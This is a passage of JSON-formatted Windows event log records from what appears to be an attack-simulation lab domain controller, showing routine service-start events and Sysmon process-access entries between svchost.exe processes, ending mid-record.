Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76820,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The tiledatamodelsvc service entered the running state.","param1":"tiledatamodelsvc","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76821,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The ADWS service entered the running state.","param1":"ADWS","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76822,"ProcessID":856,"ThreadID":1120,"Channel":"System","Message":"The vds service entered the running state.","param1":"vds","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":909,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":910,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":911,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":912,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":913,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":914,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":915,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.846","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":916,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.846\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 